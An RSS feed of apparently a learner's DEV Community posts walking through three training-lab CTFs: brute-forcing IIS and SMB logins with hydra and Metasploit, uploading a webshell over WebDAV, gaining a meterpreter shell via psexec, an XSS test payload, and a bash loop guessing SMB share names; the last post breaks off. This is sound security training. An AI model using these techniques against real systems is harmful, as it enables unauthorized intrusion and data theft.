<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: James K.</title>
    <description>The latest articles on DEV Community by James K. (@james_kariuki).</description>
    <link>https://dev.to/james_kariuki</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3096985%2F34036677-f1ca-49cf-bfe8-7a671581f44b.jpg</url>
      <title>DEV Community: James K.</title>
      <link>https://dev.to/james_kariuki</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/james_kariuki"/>
    <language>en</language>
    <item>
      <title>Mastering Host &amp; Network Penetration Testing: A Windows CTF Walkthrough</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Wed, 18 Feb 2026 07:45:28 +0000</pubDate>
      <link>https://dev.to/james_kariuki/mastering-host-network-penetration-testing-a-windows-ctf-walkthrough-25o7</link>
      <guid>https://dev.to/james_kariuki/mastering-host-network-penetration-testing-a-windows-ctf-walkthrough-25o7</guid>
      <description>&lt;p&gt;Welcome back to what is transforming into a series of articles, documenting an upcoming pentester's journey in acquiring the required skills. This article documents how I went about solving the Host &amp;amp; Network Penetration Testing CTF, specifically the Windows-based target. &lt;/p&gt;

&lt;p&gt;The lab was focused on testing the understanding of system or host based attacks, which exploit the vulnerabilities that exist within the configuartion, software or hardware of a specific machine, often leading to the compromise of systems via root or admin privilege escalation&lt;br&gt;
The lab provided 2 target machines and useful wordlists to help in the capturing of the following four flags;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag 1&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;My first step is usually to carry out basic host discovery and enumeration to discover the open ports and services running on the target. Using &lt;code&gt;Nmap&lt;/code&gt;, the results were:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3vpqz4qlgvoq3g1i60yg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3vpqz4qlgvoq3g1i60yg.png" alt="Nmap" width="800" height="433"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The results show a web server, specifically a Microsoft IIS server running on port 80. Trying to access it via a web browser requests authentication with a username and password. With the username being provided in the hint, and a suggestion of a weak password, a brute force attack was the next step. Using &lt;code&gt;hydra&lt;/code&gt;, together with the provided username and password wordlist, the weak password is promptly cracked .&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4hocjhp6psv4f8j8x71.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4hocjhp6psv4f8j8x71.png" alt="Hydra" width="800" height="80"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With user credentials, next was to find where the flag was located on the server. Scanning with the tool &lt;code&gt;Dirb&lt;/code&gt; and the credentials revealed the following directories in the webserver;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fey0a2x8to6oyykozucav.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fey0a2x8to6oyykozucav.png" alt="dirb" width="570" height="382"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Navigating to the webdav directory on the browser revealed the first flag&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4s3iiu8dwgs42g3ddbf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4s3iiu8dwgs42g3ddbf.png" alt="flag1" width="631" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag 2&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint: Valuable files are often on the C: drive. Explore it thoroughly.&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;The hint suggests the flag may be located on the C:\ drive. Given we have already gained initial access, and we know the target is running a Microsoft IIS server, the next step is to check if we can exploit this to gain elevated privileges and view the files on the webserver. &lt;br&gt;
I used the tool &lt;code&gt;Davtest&lt;/code&gt; to scan the webserver and identify the files that can be uploaded and executed on the server. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8lp5niudjcrkxlaou21z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8lp5niudjcrkxlaou21z.png" alt="Davtest" width="800" height="618"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The results show that the following types of files can be executed; html, asp and txt. This means we can upload a malicious .asp file to the server and create a backdoor when the file is executed. Using the tool &lt;code&gt;Cadaver&lt;/code&gt; and the webshell.asp file provided in the lab environment, I uploaded the malicious file to the target.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjis4hcw1okdm69r415ma.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjis4hcw1okdm69r415ma.png" alt="Cadaver" width="654" height="290"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can access and execute the file just uploaded via the web browser, which results in the page below that accepts windows command in the text-box input field. Searching through the C:\ drive as suggested in the hint reveals the second flag, and its obtained using the type command.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5u2y36wnxx34yoxki1t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5u2y36wnxx34yoxki1t.png" alt="webshell" width="634" height="612"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag 3&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint:By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag.&lt;/strong&gt;&lt;br&gt;
The hint mentions guessing credentials, which means a brute force attack to try and obtain credentials to use for authentication. I used the Metasploit module &lt;code&gt;auxiliary/scanner/smb/smb_login&lt;/code&gt; to execute a brute force attack on the target and discovered the following credentials, which can be used for privilege escalation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F068hfaik7gk7homszotw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F068hfaik7gk7homszotw.png" alt="smb_login" width="800" height="156"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I initially enumerated the shares using the session opened by the module, by setting the CreateSession option to true and connecting with the share there and found the flag. However, I was curious about another module I had learnt about, &lt;code&gt;psexec&lt;/code&gt;. Using the &lt;code&gt;exploit/windows/smb/psexec&lt;/code&gt; module, along with the admin credentials obtained in the previous step, I was able to obtain a meterpreter shell. Searching through the files and folders reveals the third flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz61af537icvojyg87a43.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz61af537icvojyg87a43.png" alt="flag3" width="800" height="629"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag 4&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Hint: The Desktop directory might have what you're looking for. Enumerate its contents.&lt;/strong&gt;&lt;br&gt;
This flag was straight-forward. Navigating to the Desktop folder reveals the last flag, completing the ctf.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58iyk4u5blieuhqmoryi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58iyk4u5blieuhqmoryi.png" alt="flag4" width="462" height="168"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;br&gt;
This lab was a great exercise in chaining vulnerabilities. We started with a simple web brute-force, pivoted to exploiting WebDAV misconfigurations for a shell, and finally used SMB brute-forcing to gain full system access. It highlights why strong passwords and disabling unused features (like WebDAV) are critical for system hardening.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;Tools Used&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Nmap&lt;/strong&gt;: For initial host discovery and port scanning.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hydra&lt;/strong&gt;: For brute-forcing the web login form.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dirb&lt;/strong&gt;: For directory enumeration to find hidden web paths.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Davtest&lt;/strong&gt;: To scan the WebDAV server and identify allowed file uploads.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cadaver&lt;/strong&gt;: A command-line WebDAV client used to upload the malicious shell.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Metasploit Framework&lt;/strong&gt;:

&lt;ul&gt;
&lt;li&gt;auxiliary/scanner/smb/smb_login: Used for brute-forcing SMB credentials.&lt;/li&gt;
&lt;li&gt;exploit/windows/smb/psexec: Used to gain a Meterpreter shell.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;Thanks for following along, and stay tuned for the next article!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>eJPT Lab Walkthrough: Vulnerability Assessment</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Mon, 19 Jan 2026 08:24:55 +0000</pubDate>
      <link>https://dev.to/james_kariuki/ejpt-lab-walkthrough-vulnerability-assessment-5cg0</link>
      <guid>https://dev.to/james_kariuki/ejpt-lab-walkthrough-vulnerability-assessment-5cg0</guid>
      <description>&lt;p&gt;Hello or hello again, depending on whether or not you've encountered one of my previous articles. I've been documenting my progress learning pentesting and trying to earn the eJPT certification, specifically my process of solving the CTF challenges throughout the course. &lt;br&gt;
This challenge was designed to test knowledge and skills in vulnerability assessment and identifying hidden information on a target web server.&lt;br&gt;
It involved the use of tools like Nmap to discover open ports and services, as well as platforms like Nessus to detect misconfigurations, outdated software and potential vulnerabilities. This assessment helps in understanding the security posture of the target environment, providing insights into exploitable weaknesses that attackers maight leverage, helping to not only discover hidden threats but also develop startegies to mitigate them effectively.&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 1
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint: Explore hidden directories for verson control artifacts that may reveal valuable info.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;After a quick ping and nmap scan to confirm that the target was reachable, a simple nmap scan revealed the following open ports:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffwqte245iqgy93r2416z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffwqte245iqgy93r2416z.png" alt="Nmap" width="800" height="302"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hint mentioned version control, hinting at git or bitbucket directories. Heading to the url containing the git repo reveals the first flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fixtcyoamqbbn063arsgh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fixtcyoamqbbn063arsgh.png" alt="Flag1" width="504" height="570"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The first flag is found at the &lt;code&gt;flag.txt&lt;/code&gt; file.&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 2
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint: The data storage has some loose security measures. Can you find the flag hidden within it?&lt;/strong&gt;&lt;br&gt;
The hint suggests that the database, discovered to be a &lt;code&gt;mysql&lt;/code&gt; database from the scans,&lt;code&gt;Version: 5.5.47-0&lt;/code&gt; to be specific, has weak security measures. Further enumeration using Nmap NSE scripts revealed that the target was configured to block connection attempts, meaning a brute-force attack couldn't be carried out as well. The nmap results, however, detailed some interesting directories that are easily accessible. The most relevant one to the database was &lt;code&gt;/phpmyadmin&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupxjpmsh97prma110ist.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupxjpmsh97prma110ist.png" alt="nmap2" width="800" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The webpage reveals some databases, including mysql. &lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvm8uyd7k3crwix9lxh8w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvm8uyd7k3crwix9lxh8w.png" alt="phpadmin" width="800" height="410"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Further enumeration of the database reveals a table called &lt;code&gt;secret_info&lt;/code&gt;, in which the second flag is found.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0azb5ilqjhy26zmp5yvw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0azb5ilqjhy26zmp5yvw.png" alt="Flag2" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 3
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint:  A PHP file that displays server information might be worth examining. What could be hidden in plain sight?&lt;/strong&gt;&lt;br&gt;
A quick search revealed that the file that displays PHP server info is likely to be &lt;code&gt;phpinfo.php&lt;/code&gt;. The nmap results from the previous step showed that the file exists, and possibly contains information. Navigating to it from the website reveals the file.&lt;/p&gt;

&lt;p&gt;Scanning the PHP Server configuration file reveals the third flag in the configuration section:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff4ec4gjm33lo627oqvbt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff4ec4gjm33lo627oqvbt.png" alt="Flag3" width="625" height="348"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag 4
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Hint: Sensitive directories might hold critical information. Search through carefully for hidden gems.&lt;/strong&gt;&lt;br&gt;
Following the hint, and more focused review of the results from the dirb scan from the previous step, the directory that immediately stood out was the passwords directory. Further enumeration of the directory revealed the  files below, one being the final flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wg54414bgts2te0wzc8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wg54414bgts2te0wzc8.png" alt="Flag4" width="515" height="294"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Even though the lab was finshed, I was still curious about what Nessus had to offer. Using the provided credentials to access the dashboard, I carried out a basic network scan after discovering the target host, and found the 24 vulnerabilities in total, but only 1 held a severity score of medium:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4t4bzehw8tzvjpu0zeu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr4t4bzehw8tzvjpu0zeu.png" alt="Nessus" width="800" height="429"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Further research revealed that the specific CVEs were CVE-2020-11022 and CVE-2020-11023. I went about trying to confirm that the target is indeed vulnerable to this exploit.&lt;br&gt;
Using burpsuite to inspect the requests and response trying to find a point from which to execute the XSS attack, I found some interesting comments that provided the needed info. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1yhhimih2wsxqftlcxi4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1yhhimih2wsxqftlcxi4.png" alt="xss" width="800" height="332"&gt;&lt;/a&gt;&lt;br&gt;
The vulnerable header was &lt;code&gt;User-Agent&lt;/code&gt;. Using the proxy to intercept and  modify the request to test the simple script &lt;code&gt;&amp;lt;script&amp;gt;alert("XSS-Test")&amp;lt;/script&amp;gt;&lt;/code&gt; confirmed that the target was vulnerable.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z0vq1bjz972mk3k6qop.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z0vq1bjz972mk3k6qop.png" alt="xsstest" width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To wrap things up, this lab really put my vulnerability assessment skills, particularly the second flag. The lab also highlights that tools aren't everything, and that manual investigation is key to finding the hidden stuff that automated scans might miss.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>Cracking the Shell: Enumerating SMB and SSH in the INE Skill Check Lab</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Sun, 04 Jan 2026 12:42:30 +0000</pubDate>
      <link>https://dev.to/james_kariuki/cracking-the-shell-enumerating-smb-and-ssh-in-the-ine-skill-check-lab-4jj4</link>
      <guid>https://dev.to/james_kariuki/cracking-the-shell-enumerating-smb-and-ssh-in-the-ine-skill-check-lab-4jj4</guid>
      <description>&lt;p&gt;Hello or welcome back, depending on whether you read my past article. This one will detail another CTF along my learning path. It focused on enumeration techniques to identify and analyze running sevices on the target machine. The challenge required me to apply my knowledge of network and system enumeration to identify misconfigurations, weak credentials and potential security vulnerabilities. I had to capture the following 4 flags, and this article details how I went about that.&lt;/p&gt;

&lt;h4&gt;
  
  
  Flag 1
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: There is a samba share that allows anonymous access. Wonder what's in there!&lt;/p&gt;

&lt;p&gt;My first step was to ping the target to confirm that it was reachable, then an nmap scan to discover the ports on which samba was running. I also used a few NSE scripts to further enumerate the ports. To enumerate the shares, I used enum4linux to determine which shares allowed anonymous login.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr21e7bb83diaarca36dr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr21e7bb83diaarca36dr.png" alt="enum4linux" width="800" height="258"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The results showed that there were two shares, but none of them allowed anonymous access. This meant that to find the share containing the flag, brute forcing the shares was needed. There was wordlist provided that we could use, and with a little help from ChatGPT, I came up with a simple script to loop through each share in the wordlist and test if anonymous access was allowed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;for share in $(cat your_wordlist.txt); do smbclient -N \\\\TARGET_IP\\$share -c "ls" 2&amp;gt;/dev/null &amp;amp;&amp;amp; echo "[+] FOUND SHARE: $share"; done

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's a brief explanation of the script:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;for share in...:&lt;/code&gt; loops through every line in your wordlist.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;smbclient ... \\$share&lt;/code&gt;: attempts to connect to that specific share name.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;2&amp;gt;/dev/null&lt;/code&gt;: silences the "Bad Network Name" errors so the screen isn't flooded with failures.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;&amp;amp;&amp;amp; echo ...&lt;/code&gt;: Only prints the name if the connection is successful.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After saving the script in a file and providing executable permissions, run the script to identify the share that allowed anonymous access. The share found is &lt;code&gt;pubfiles&lt;/code&gt;, and has the first flag. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5a99cqha4rl8frk087h8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5a99cqha4rl8frk087h8.png" alt="script result" width="609" height="142"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Access the share using the smbclient tool, using the command&lt;br&gt;
&lt;code&gt;smbclient //target.ine.local/pubfiles -N&lt;/code&gt;&lt;br&gt;
After dowloading the file to our local system using the get command, we can view its contents and find the first flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fma7zvv11urq3nlzsitoj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fma7zvv11urq3nlzsitoj.png" alt="Flag 1" width="322" height="62"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Flag 2
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Hint&lt;/strong&gt;: One of the samba users have a bad password. Their private share with the same name as their username is at risk!&lt;/p&gt;

&lt;p&gt;In the enum4linux results in the previous step, I found a few usernames, and as the hint suggests, one of these users has a weak password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0jck26phziid9q3ex62.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0jck26phziid9q3ex62.png" alt="enumusers" width="720" height="112"&gt;&lt;/a&gt;&lt;/p&gt;

